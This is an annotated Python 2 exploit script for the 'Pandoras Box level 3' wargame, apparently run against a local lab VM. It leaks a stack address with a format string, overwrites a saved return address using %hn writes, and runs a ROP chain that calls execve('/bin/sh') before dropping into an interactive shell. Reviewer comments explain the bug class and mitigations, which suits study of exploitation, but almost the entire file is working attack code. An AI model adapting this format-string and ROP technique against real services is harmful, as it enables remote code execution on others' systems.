Pandoras Box level3

# A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
#
# This approach is different and avoids dealing the stack cookies
# Enjoy
#
# Reviewer notes -- what the script below visibly does, in order:
#   1. connects to REMOTE:PORT and sends a '%08x' format string so the service
#      echoes a stack address back;
#   2. derives two addresses from that leak (start_game_addr, bin_sh_addr)
#      using fixed offsets (-48, +278) that are specific to this binary;
#   3. builds one payload: a '9999' marker, two packed pointers, two '%..$hn'
#      writes, padding, a chain of hard-coded gadget addresses that ends in an
#      int 0x80 with eax == 11 (execve), and finally the '/bin/sh' string;
#   4. sends it and hands the socket to telnetlib for interactive use.
#
# Python 2 only: 'print' is used as a statement and struct.pack output is
# concatenated with text as a single str type; under Python 3 this fails to
# parse.
#
# Vulnerability class exercised: a format-string bug (user input reaching a
# printf-style format argument) yields both an information leak (%x) and a
# controlled write (%hn). Defensive takeaways: never pass untrusted data as
# the format argument; -Wformat-security / FORTIFY_SOURCE flag or block most
# of these; PIE + ASLR would invalidate the absolute gadget addresses used
# below (presumably a non-PIE, fixed-address build -- TODO confirm).

import struct
import socket
import telnetlib


# 192.168.56.x is the VirtualBox host-only default range, so this is
# presumably a local lab VM; the commented-out value is the loopback fallback.
REMOTE = '192.168.56.101'
# REMOTE = '127.0.0.1'
PORT   = 44101

mysocket = socket.socket()
mysocket.connect((REMOTE, PORT))

# Obtain a leaked stack address
# '9999' is a marker to locate the reply; '%08x' makes the service print one
# stack word as exactly 8 hex digits right after it.
mysocket.send('9999%08x' + '\n')

# Ensure all response data is returned
# NOTE(review): `data` is replaced on every iteration rather than accumulated,
# so a marker split across two recv() chunks would be missed, and recv()
# returning '' (peer closed) would spin here forever; the usual pattern is to
# append into a buffer and treat '' as EOF.
while True:
    data = mysocket.recv(1024)
    addr_loc = data.find('9999')
    # NOTE(review): `is not` compares identity, not value; this only works
    # because CPython caches small ints. `!=` is the correct operator.
    if addr_loc is not -1:
        break

# The 8 hex characters that follow the marker (the %08x output).
addr = data[addr_loc+4:addr_loc+12]
print "leaked stack address is " + addr

# Calculate offsets for the return address of the function "start_game"
# i.e. the stack slot holding start_game's saved return address, 48 bytes
# below the leaked word (offset is tied to this binary's stack layout).
start_game_addr = int(addr, 16) - 48
print "start_game address is  " + hex(start_game_addr)

# Calculate offset for the future "/bin/sh" string sent next
# Where the '/bin/sh' string appended at the end of `sploit` will land on the
# stack once the service has read the payload; again a binary-specific offset.
bin_sh_addr = int(addr, 16) + 278
print "bin_sh address is  " + hex(bin_sh_addr)

sploit = '9999'

# These two pointers are placed so that they become the 11th and 12th
# positional format arguments referenced by '%11$hn' / '%12$hn' below
# (presumably -- the argument index depends on the server-side call).
sploit += struct.pack('<L', start_game_addr)        # Offsets for 0x080485af (start_game)
# sploit += struct.pack('<L', 0xCCCCCCCC)       # Debug values

sploit += struct.pack('<L', start_game_addr + 2)    # Offsets for 0x080485af (start_game+2)
# sploit += struct.pack('<L', 0xDDDDDDDD)       # Debug values

# Change return address from start_game to ROP bootstrap
# %hn stores the count of characters printed so far as a 16-bit value; the
# two field widths are chosen so that the two halves of 0x080a8308 are
# written to start_game_addr and start_game_addr+2 respectively.
sploit += '%33521x%11$hn'               # 0x080a8308 - add esp,0x10c; ret
sploit += '%34050x%12$hn'               # 0x080a8308 - add esp,0x10c; ret

sploit += '\x41' * 0xba                 # Padding because above we moved 0x10c 'up' the stack

# Everything below is the ROP chain executed after the 'add esp,0x10c; ret'
# pivot; each 4-byte value is a gadget address or a register value popped by
# the preceding gadget.

# Zero eax
sploit += struct.pack('<L', 0x0809807f)         # xor eax,eax; ret

# Zero ecx + set ebx with addr of '/bin/sh'
sploit += struct.pack('<L', 0x080540cd)         # pop ecx; pop ebx; ret
sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr)   # Address of /bin/sh

# Zero edx
sploit += struct.pack('<L', 0x080540a6)         # pop edx; ret
sploit += '\x00' * 4                    # set edx to 0

# Set eax to 11 (syscall for execve)
# 5 x (inc eax; inc eax) + 1 x (inc eax) = 11 starting from the zeroed eax.
# sploit += struct.pack('<L', 0xEEEEEEEE)       # Debug value
sploit += struct.pack('<L', 0x0806ad3e) * 5     # inc eax; inc eax; ret
sploit += struct.pack('<L', 0x0806ad3f)         # inc eax; ret
sploit += struct.pack('<L', 0x08054820)         # int 0x80; ret

# And finally the '/bin/sh' string
# Repeated leading slashes are path-equivalent to a single '/', so they act
# as alignment padding without changing the path.
sploit += '////////////////bin/sh\x00'          # Padding then null terminated '/bin/sh'

# Bombs away
mysocket.send(sploit)

# Drop into a interactive shell
# telnetlib.Telnet is used purely as an interactive relay on the already
# connected socket; no Telnet negotiation is performed by this script.
tn = telnetlib.Telnet()
tn.sock = mysocket
tn.interact()